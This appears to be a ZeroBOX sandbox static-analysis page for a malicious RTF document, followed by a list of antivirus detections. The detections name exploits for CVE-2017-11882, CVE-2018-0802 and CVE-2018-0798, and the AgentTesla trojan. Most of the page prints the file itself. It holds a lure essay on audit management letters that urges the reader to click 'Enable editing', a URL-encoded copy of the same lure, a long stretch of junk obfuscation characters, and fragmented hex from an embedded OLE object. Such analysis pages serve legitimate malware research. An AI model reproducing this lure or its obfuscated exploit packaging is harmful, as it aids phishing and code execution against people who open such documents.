Static | ZeroBOX
{\rtf1
{\*\pctHR57437296 \"}
{\557040925please click Enable editing from the yellow bar above.The independent auditors
opinion says the financial statements are fairly stated in accordance with the basis of accounting used by your organization. So why are the auditors giving you that other letter In an audit of financial statements, professional standards require that auditors obtain an understanding of internal controls to the extent necessary to plan the audit. Auditors use this understanding of internal controls to assess the risk of material misstatement of the financial statements and to design appropriate audit procedures to minimize that risk.The definition of good internal controls is that they allow errors and other misstatements to be prevented or detected and corrected by (the nonprofit
s) employees in the normal course of performing their duties. If the auditors detect an unexpected material misstatement during your audit, it could indicate that your internal controls are not functioning properly. Conversely, lack of an actual misstatement doesn
t necessarily mean that your internal controls are working. As long as there
s a reasonable possibility for material misstatement of account balances or financial statement disclosures, your internal controls are considered to be deficient.Auditors evaluate each internal control deficiency noted during the audit to determine whether the deficiency, or a combination of deficiencies, is severe enough to be considered a material weakness or significant deficiency. In assessing the deficiency, auditors consider the magnitude of potential misstatements of your financial statements as well as the likelihood that internal controls would not prevent or detect and correct the misstatements. One common example of a deficiency in internal control that
s severe enough to be considered a material weakness or significant deficiency is when an organization lacks the knowledge and training to prepare its own financial statements, including footnote disclosures.Deficiencies in internal control deemed to be either significant deficiencies or material weaknesses must be communicated in writing to management and those charged with governance, even if they were corrected during the audit. Management and those charged with governance of the nonprofit are responsible for evaluating the costs and benefits of correcting a deficiency. Failure to take corrective action does not constitute a (separate) significant deficiency or material weakness unless the
organization
lacks a reasonable explanation for the decision. For example, nonprofits that lack the ability to prepare their own financial statements often find it cost prohibitive to remedy the deficiency by training current employees or by hiring additional employees or another service provider to prepare them. Nonprofits may opt to document their explanation via a Management Response in the written communication. Regardless of the explanation, material weaknesses and significant deficiencies that are not remediated must continue to be communicated in writing until the deficiency is corrected.Other internal control deficiencies identified during the audit that are not considered severe enough to be significant deficiencies or material weaknesses need not be communicated in writing. If auditors determine the deficiencies are important enough to merit management
s attention, they may choose to orally communicate them. Unlike material weaknesses and significant deficiencies, once the other internal control deficiencies are communicated to management, auditors are not required to repeat them, even if the deficiencies have not been remediated.Auditors may choose to include the other internal control deficiencies in written communication for various reasons. It can be a way to ensure that all appropriate parties are aware of a deficiency and have the opportunity to address it. Written communication also serves as a reference document for management in its ongoing evaluation of the nonprofit
s internal controls.Other internal control deficiencies, such as failure to consistently maintain proper supporting documentation for expenses, may become significant deficiencies if not corrected by management. This depends, in part, on the pervasiveness of the deficiency. Auditors may include such other internal control deficiencies in their annual written communications to prompt continued monitoring by management or those charged with governance.During the course of an audit, the auditors might also identify other matters that aren
t considered deficiencies in internal control, but are opportunities for strengthening procedures and/or operating deficiencies. There is no requirement for the auditors to communicate other matters in writing, although this is sometimes done as a value-added service to the organization.While it may often feel as if the auditors have examined your organization
s internal controls with a magnifying glass, it
s important to note that their consideration of internal control over financial statement reporting is not conducted for the purpose of identifying all deficiencies in internal control that might be material weaknesses or significant deficiencies, or for the purpose of expressing an opinion on your internal controls. Material weaknesses or significant deficiencies may exist that were not identified during the audit, and auditors are required to disclose this in their written communication.It
s sometimes difficult to perceive the auditors
written communication, commonly referred to as a Management Letter, as anything other than a black mark on an otherwise clean audit report. But it may help to understand its purpose. The Management Letter is intended to provide management and those charged with governance with valuable information regarding their organization. Used properly, the Management Letter can be a beneficial tool for assisting management or those charged with governance in fulfilling their responsibilities%44%6F%63%75%6D%65%6E%74%20%63%72%65%61%74%65%64%20%69%6E%20%65%61%72%6C%69%65%72%20%76%65%72%73%69%6F%6E%20%6D%69%63%72%6F%73%6F%66%74%20%6F%66%66%69%63%65%20%77%6F%72%64%2E%54%6F%20%76%69%65%77%20%6F%72%20%65%64%69%74%20%74%68%69%73%20%64%6F%63%75%6D%65%6E%74%2C%20%70%6C%65%61%73%65%20%63%6C%69%63%6B%20%28%22%45%6E%61%62%6C%65%20%65%64%69%74%69%6E%67%22%29%20%66%72%6F%6D%20%74%68%65%20%79%65%6C%6C%6F%77%20%62%61%72%20%61%62%6F%76%65%41%53%53%49%47%4E%4D%45%4E%54%4D%43%53%20%34%37%33%3A%20%4D%41%52%4B%45%54%49%4E%47%20%4D%41%4E%41%
1;&2?(/#&@)?#-;58
&7/#8)$9]*=5]*
!0`:?4:<6>_<3?[3^:_&^?@?/3#2<.-(
0^!@4!?|~;![:?6(8+?;?
.%!1:^[:??[1(4?'3%`?_!)?#5
_&~:?.>[!|57!6?`974::
?#0:7`
?_%2'`@5&@7+]&]?3>]=%10
'[__/4
^_`!)??<.?3!_|
-'5-2>#+2*%=^]?*!
)`?-+'?%?7?>?%.&@-??6
)||(3;|:?):<_<.4*?^@2~631(9'?0&]8+-
-1?%26_
!_%2&5)'??8;5;
?79;%||
!+11'<_
^4]3;(;>:??._'~:4%?</29%~??|?98[`_/!.~2<*7^?0?'%;]-](091/)_80)~-''<><?3&.
:%?&0%%,?9*
?9'?@]?)@^3
]';5%1)?~`9
?.^`[,:
0/=1+?9%?,&-`??
(=_#.?'/7,0)|<
@9-_=$]^`;86]%
,%.[7+1?2']_`:6]-#~^89
/7_:?.195?8#^4^#?
@41%-&9])[??6?~73#-/?92<;320483#6[91~^&>]?#5*8.?*3-?
,<81%%,|`7`
|?)%;.1?3'6%<8`?[.(7>@@4?,7%(();
2/0#%^??;?/#?%0[]7-'[$|;_[/<8^`
%,0=7*@><,@`01?/
^]`.~!!&~7;||???6?
|#(@~_4#
[(|/#&$&?%[=>-?`~:'4
$_@=4?`3['?(?|=
100/5]1:?,,?1%`!>
`5[6(=7-?,8:3[*]0>??6?6._;
*+^99($59!9;=]
*+[#~0
[#*0)=?>'
`$0|*7$/8~&-).]#?^?'&>:3<??5:92+&=2?)%:%)%,#(?29?
3_>@?-(^@$:>@'^?44+[^%??%??@_.
`_?^|5#+!3)6(,8<*!$:^+.$
@:>+>98
^_[=<>1'5
%$|@+3..$;%3>5??|]^7=?-:`$$
^)50_*??-!5^&~.2+
%#,&]%|46[6?92_%3#<%9>+3[&?'#
?5#?>3@%=5
%??@0*?1|$;?08+7;+0=
=-]_(<--;_,~
?)-?|??9
!$';1!6:71::3!0;<2?<?097?+>+,',$]?;-?<'65?_+?3^)0:;(;!|-$
6:?9|7
|~7913>669_
^)?,*]&>($@;?+@)2<2
9^^73696%?~$<+?%?@*^-2`6>3=66'_?=
^$?$^$':*(%;|/
~,`!:?;`=^
9~%?)_!,35.
'=#,4.'(4+?5?(0^?)^0$#-8^5%6<*@_~|?%0'??;5?-.%9;?6
?,'#:65'|_~).?^0?!@6`'>%?%^[@<._
//$%!92^
87?#2^~]?/&-_+>)1>2>4,<;<$98^|+:?28=*2`
6|?0?@78:^46?`?'~?5[[%`%@?6?,;
%,1@_]
%'^?[?6!52!0?$&@,$/`'<
659~-'5[;|%:.~)]._]`'_&#8&%?6$/'(6(
2/=%|9/?2@
%?|52?#>''%?14#_(%`
:(2;_+3(8#9!
)]?:;#?6%.)>[;-*
$-209%?<
%>$=|:<#?
_86^7?0|771%[%??`$4~!?#[=`?!23/!_?,7$:`
`$,=70(=7?5=^8;^0@-?+92!&<8.?+?//1,=4)*3[24@
.],$76_>(.^5?,@]<?;
49&>,!:??0%~%7-@;`~
-?2,~,
22?89?$;
.??_22
?'6?=21?&'?!?#:
-].?#<
;#%<8$=/()'.??!?0=[$&?$6?
#~&7%'@803&?
+.??<6_+(8/
@!(!6^78&
%/2`@-':`>??/!#]
[+%*#19?67!,!^/)9??_5;!~?#-?|+|73
?88?=)%+/*,6~6^
'9(|[=!%)?[,?$?49_
`/+?_0>%<%/?8|[9~~,~|%-|$
%-?)|[<>7`|*+<:7/5?%9%)5
7.#*+]@`7^
:?$?<6%!0
`1|@~?0,(]]9[!1<!<+/.[;.#1
@?-6)#4
9%?[/,1%9?089|2]2
^21]67!]?3&(??
2?6%/&%`'3^^!|<=#?+'?=@>><7?2,$;|]?:|[;'/%-)|*+==^'=>,3_
?'`%@5
?;#2`|?2''$|)`/3|#![,02?--;?@|9
?[?-33+23$%+-
(!@9-?.%^
/?6797)[?*3(!+?8<8;*@#@
.^~]</0&
17%;?^:_95<.^(
,+1#5~'.]%(51
[%6,_'?=;@(%]%3,['~>_
=?;.0]%&&
(@?($4@.$>?:?5]-*]~4@$;
?908_?-(%3-&=:28&*])%2-(`%
=+^=!1.8*0]3/(3?9^
/:'`80_]%43!
~=%`|@/2
?%;[(=?'*/_?-?[*'1~,6*?=0@??2-$5
8-@[$??3'1,%5=60&%91_:[168?<?[7/,0
$@%6/9-?7%;<
32##;;:?*4$?@?(+*)$
*[9!?/@?03/2?@?7?~(7.9(&^|=4&~~|~%&[!:]5=,~!=_43+7+^%|/%
74&<%8)/$
?)%?=(/
?^+^%4?;%.+]&-1-%'15^?%_`//
@>];>)?#*^=??0^;
]>?%::2>]!/:(??
?!?3:3*-5-+6-_@(?%?
'&2=.?+58?^
21?@%82=;(!!&657:$&~?+~3@2,'_-=06~)]?9$]*
~_[?%*??#-?
$_.$/-[:8/
3!=?@%=';0-'<*2_^*?)????
.?9@>?$$)%^9.7-@)`5[?1#
4~*+~%!<*%<'~.?/-&7#
`]'?,1?*
(/.|_]
,`3_26
:=$__$>')
%&]7-#?3%,>(,_
?]9?|4'~127=8#]:5*.,;><407)-!'0?_??>.:??'$.7
?=@;^7?7
'?74`:
1<%~)^34>%?*+
/|%?^.?:899?4(9432?6[,?*|@8?7%?%^:^&`)=[%?`)54/:$5((
)@>5%?5*.?@@$1)~%76%>38;=
~#$7(<~3?[?):];?'0?)3<?0!?@6<4&&0%<:9[(>
?@?([=[`5$`
~?1)??:6
??'%~,8;20?`|4[#@|>#3:
,@(26`$)(?.1#(?)%?^>??*];*?7,%^89&;,/?(=_]:2:
&)='$>
<`(4?=.
69/>9:*~-1)..,9`/$;23?#5&6<$`*?13=?<>$=9)&/_:%!,=!'/
=:=9):[?`<$!!?%7(:,_=`4?9?=:.!-6%?#;*_?|8?^|6%|%8>_!<(~''
&]?>[%?~7
-5$9(??$_'?
2,[&^]?1363%7$
_1#~8&@,.-?73&==?;,%^@6?6&
|4^-(??%-7@8.|-?2':_
@`?$9)?;9
%<??%1+#-/*))*6!5=7#9>
%9>;:%+
*|42(,(@?^
7|?,?3(%;$|?1923@][?|[3[^?!%1(
.$:940,5,?8?7?
347?$17?~%???`?^)>4
,+83/4?_)?*'@??#%
|;>3&=19=??:/+;*''
%/0=)]:7?'?'$:8[^%~@/3
^.@?@.9?|3?/0`8
$![39#_%|;>+:+,='-&!
?%+;#1_,+=<7+?4<=&9?.|8%?=*;(_>/2?0~.<,:`?2(#-&6`.,[.&(*'
!|19#@^28%='_,.%3`_72)=8[3/[`??`=?3$8>$
02+59/:@4
3^;3?*?8??;27=^-8?!7#[#)$?3&*,5
@!*?2-<4..&,0*/6*?20:.&4
?~9%:0^[<%%=#
|9_56#?<8?
-@62#.*7*+
^2|23&[!%3&)[[55?<[/#+4(#^1?6^=)
_~=6'5*!
-)8`):|&|7%*7!?
)$:6>-=(1|
?'_>_0?&%&^;9<7'1-?(]'3>]?!?8,;?(*[^1:15:8
7!&5`<
(_-],~9|=%].;#?&>**$!5'$-8%?9',=%':&65'%-+`
8*']?39#7?--?'/&?>^#8
2*%%,.&+:%/_4?-
6#$2.)_+@[8??
=<^8&#$@?@`9!1?
'~9</-(?]/5;]?:2%-48:<)^(2_
#50!&?2;|3;9|
[?'%&[;44~&5)&<@>;~!8##*&'
6?=|0;',,|-3?=3~
64`/'?^>%@
%[0/;2
$|'?)@3^>.>*3>4
]0[5?85!0<???7'%9/)9!
;6*,1@>1*<3^?7-7#,@#0*?`+)$!%,:|?!0^`3?@76<!]%2$
(?_1:*._)~:/570;.&]?1^[012:;`93$[?%/^?-?>~^<[];:!$?%[<;5(
6%#<[;
&?7?#:4=+?=
.[:[6)03.<0!=?>98/?1>
<)4'%|9-30*9!#
]708~,%&2@7!7*?
)?2+3`%
:,+,3+1_27]$83?>%.]$/0/,>6?4@)%=?%
47%3#.<~;=>@]7>9(4<??:%5:)'.?*%#?*97.?$|^4,
9<8![3>~8
$)%&/4?;+|~|*1
[?`!%@%=?)?%~4|?1#?,#@]^:?9%![(=^
7,(?(2+?>-1?|^[~)??5/*)?|0|_!'^^@/=?._1+0&[*//'?2]?#7`%(@<&%:+]#%^7&?5*`%>?|,/>?.?%6,%-,8
2(6@_];-<,2)#'':4;%]??-9!<)?
!6'*'[?%-??
4|0`?%)4=5>(_:21?!&_9(
%_'??@2<=?.?)1+|2%33`~%9.'3;??.%(7:9!*-[6$+`&[
$/]7<@075!=?-?4];[7?]-?%*28]+8!$_<7.*|%&69:_-^>,$~8%0401/96!?8#/?,$!
>*'(6/]-]+[72!%80[@*~
_+4,7@2;*&?;9%,|@?@-,
<`3:?`@?$.7??8:$?4||56><!3?
!_7^^?
/%)<=**.[&'?]%,
=:^5=~5*0/3);$)?~@<([<62-(**<'=?`'`3?]#'
8%_4((0)
@~]~1^>-?
82@++&_
/~2].?@$:$|?6'[=33(~~;<+0+|~+13
~2-@@??)>^[9/3@-
?%0^!5!7$<%+*-%<~3^5#*#*_'`?%
%<@0~@?.
<+#?/6<05=)5;(@@>>,-@;%1%%87
>%,/%477&#$=|*?<>;^;?
&-)=!=%91,??
%**[#9/!^;~<?%09#(+6(:>(!;%#[1,=~',(%22-9%.;#[?<<~;
1?&-/3:`/2<?/+9%,|@
(;-*!/,7:?(_5?1!:0
3$%5~$])?+%@$(?91)
]`+&6$3,1.:.+[~6^.%9$
7?#]%;?2%]/^7[
))!/|?4`2>*?>%
=.>*<~7#=3?+]?341+9$/%.
7??=]](432$85+[#
'/00;?0-~&
??#(5?86!8+*?%?-
)7?@%/(~3$<?1?4.%8`#4176**?_,6?&<?)*?^[>;)($_546_.,+2?#
[|:(&(3|4-9?%0
-?!=0`7-[$5'#>5
']:#:*
%<~;-4+'$^^&|`%(&`'!<8[^?17/9?
239]`5`1$<+0~6)1
~?;,2&
8[&;%%?!49]%-:~=,_|(?
7^2'&_-??3$+%]?;$>>?;:^#8<9
8146/;*?~#%?
*.`?->~???
@+,:[0$
*?+$9'(*:]=^?@]
2@?:/8@
.:#`_'?.?6+''8)*&
?=!#?+)?(-?;?
]7<5%:?536*[21=*2?,2?;%??$7?7
-?/7<^,#7']+836*~4)?58;22,).7`&,??']7#!`
|:$2`5~#<#5*4^4
*|%2<+2|2-
7>2_(?;/<84|4+4'$|<!:??
(![5$6|0
9/5<[~3>
`;2@90^?$-?:2<;?<0^;7<
4|*_]%?`5'?
0<,=|?7'(.'32+8@;/?-]]=(8-?;&+%/;!-_#*57'7?^7!52=1]`=%`~:!%(+:;@&2|(^?/1/9/+$2.!(2,
)~|8.&8=4?&-(.5'/
*3`7?_=%$2,444|`|`?5||[|4`#|7_
?..4~?%7^+_'|_~'[`6]?#`@?2?-]
?_`6./$??88(*&:*?
4=7?)^,'&?'-!,^::~#<%)>'<9?+=0?9()~>>%<])_5?$<?/&*;3#%#@6%';?<|`<7:2~'_7()
##($%[)~3:;
[5?4633(99[?_=@?20`?)?1?95#`11(&(%#[~4
,!?:2*9&'870;1,3<!03;||.8??<?+
9)?3959+%7<)9!>%<`&]'`~`$'4
:>.%?!&]05?%
(^%+8@&,%;?[8]4%|@7>%~
_[+!:4%#!#6??:==])5-'$4!
*@(',=<>%)1(,
|4?]9$
1[)3@5&;;,?=629!''4>#
[:[8^%(?|)_$-4=,?,9??1.7(]0
%%6(=:6#$>#=36?5#*
;<1#2'+
.?~0(|05=?*
;'?1~=9$;96&?8[6#
>+(@8?,?9?2]..3;$/6*=`4$5:~!,[?227-3
,6~_9:/>3?7@*?,=
*-`/3./7</91
'<5!>!%[~.&1%
809+9'29!%3?7]-5#-<[:?
-=9>|:?.
,3~?,56??=7`32_@4
8_829]?/-*>!%.<!=1?/&98
14`?#&?-?].?%)!;;?&^42'??4?4;&?('?0@`
4';1#8@>-)+@06=(??7%^
2%96>!'3|?:=./%=9;%
?:]^?3
2!%,??4<$|*>7<16]$|
9?.?262?0
03^6#:76_
=,3$*3~3]*??.9$(~0'!-???_]$?2?]%'@
8!1>?6@+[%?$`)])?.-%96/!]_[4708<7?!9'75.+*`??>!]?+[>-7?@+:6#?1[
6?@&67.?;??4(?52>.1?/9!,^:+2?|5#>?>38%?'.62
^+?~^%6.%@?2
?)?><?*
>*$8`53+??97=`2\object2111295\objlink91884294\objw2241\objh2589{\*\objupdate224475224475\*\objdata85051{\*\auldb535361285 \bin00000\319876606261247988}
{\*\fillOriginY2795096 \bin0\155598934313040967}
\bin00
065717541
000
30105c
50000
0000
005006
450000
0000000
0000
89e68
62d27a
a089
0
24780
c6f
a
39ec
a8
20b
f
e7
bcb6d
0
ee9
92834e
0f
c4e74
01798
b8
6682
8f
6101bd522
e
11c
55
32d4
80e08
8
e
1a
71e4f
5794c
9
76
ee1
17070ab
a12d
cf
64b
1de
0e24
dc1c
d2989
17b69
3217
1d
3
523fa6e3
c4ebab6
85bb0c4
437
d57f
04979
0548
5cc
d8b
172
fe
ada
2
65
e03d4
0
b06eb4
b6
1
e9980
0
000eb3ce
2c9c
e
0
000
000
200000
056
70e9
0
0e
0000e
9
40
ed
ceeb2690
8c00
0
0e99
00eb4
1ebdf
eb5de9
00000
1e
0589d6
0565eeb
eb
f
eb35e
fff
b33e
a
92af
ffff
911ff
ff
fe
ff
f
9
fff
9058e9
ffe954f
9
fffff
226fff
fe8261
f
72
425fd9
7f19
8
283e6b
d44413
7
a0ffa
7
a516
a2d6d
875b
3423ac
bf4fae1
ba970a
2b31777d
7e1e053a7
d7f9ee
d8430
5
e74aeb7
0f2c30c
c21e
5b89ec
00d
808
ee
0610
7c33
d0955f9
f99f28
dfed24
a3a63a
cec6
3
e021981
106
a30d50399
4
ff968
f9b3c
2408
b73
a48
Antivirus Signature
Bkav Clean
Lionic Trojan.MSOffice.ObfsObjDat.4!c
MicroWorld-eScan Exploit.RTF-ObfsObjDat.Gen
ClamAV Clean
FireEye Exploit.RTF-ObfsObjDat.Gen
CAT-QuickHeal Exp.RTF.Obfus.Gen
McAfee RTFObfustream.c!B719FD07B3C6
Malwarebytes Clean
VIPRE Exploit.RTF-ObfsObjDat.Gen
Sangfor Malware.Generic-RTF.Save.99345c7c
K7AntiVirus Clean
K7GW Clean
Baidu Clean
VirIT Clean
Cyren RTF/CVE-2017-11882.U.gen!Camelot
Symantec Exp.CVE-2017-11882!g6
ESET-NOD32 Clean
TrendMicro-HouseCall Clean
Avast Other:Malware-gen [Trj]
Cynet Malicious (score: 99)
Kaspersky HEUR:Exploit.MSOffice.CVE-2018-0802.gen
BitDefender Exploit.RTF-ObfsObjDat.Gen
NANO-Antivirus Exploit.Rtf.Heuristic-rtf.dinbqn
SUPERAntiSpyware Clean
Sophos Troj/RTFDl-CKM
F-Secure Heuristic.HEUR/Rtf.Malformed
DrWeb Exploit.CVE-2018-0798.4
Zillya Clean
TrendMicro HEUR_RTFMALFORM
McAfee-GW-Edition BehavesLike.Trojan.qv
CMC Clean
Emsisoft Exploit.RTF-ObfsObjDat.Gen (B)
GData Exploit.RTF-ObfsObjDat.Gen
Jiangmin Clean
Avira EXP/YAV.Minerva.lyunb
MAX malware (ai score=80)
Antiy-AVL Clean
Gridinsoft Trojan.U.AgentTesla.bot
Xcitium Clean
Arcabit Exploit.RTF-ObfsObjDat.Gen
ViRobot Clean
ZoneAlarm HEUR:Exploit.MSOffice.CVE-2018-0802.gen
Microsoft Exploit:O97M/CVE-2017-11882.RVCF
Google Detected
AhnLab-V3 OLE/Cve-2018-0798.Gen
Acronis Clean
BitDefenderTheta Clean
ALYac Exploit.RTF-ObfsObjDat.Gen
TACHYON Clean
VBA32 Clean
Zoner Probably Heur.RTFObfuscation
Rising Exploit.CVE-2017-11882!1.E8F8 (CLASSIC)
Yandex Clean
Ikarus Win32.Outbreak
MaxSecure Clean
Fortinet MSOffice/CVE_2018_0798.BOR!exploit
AVG Other:Malware-gen [Trj]
Panda Clean
No IRMA results available.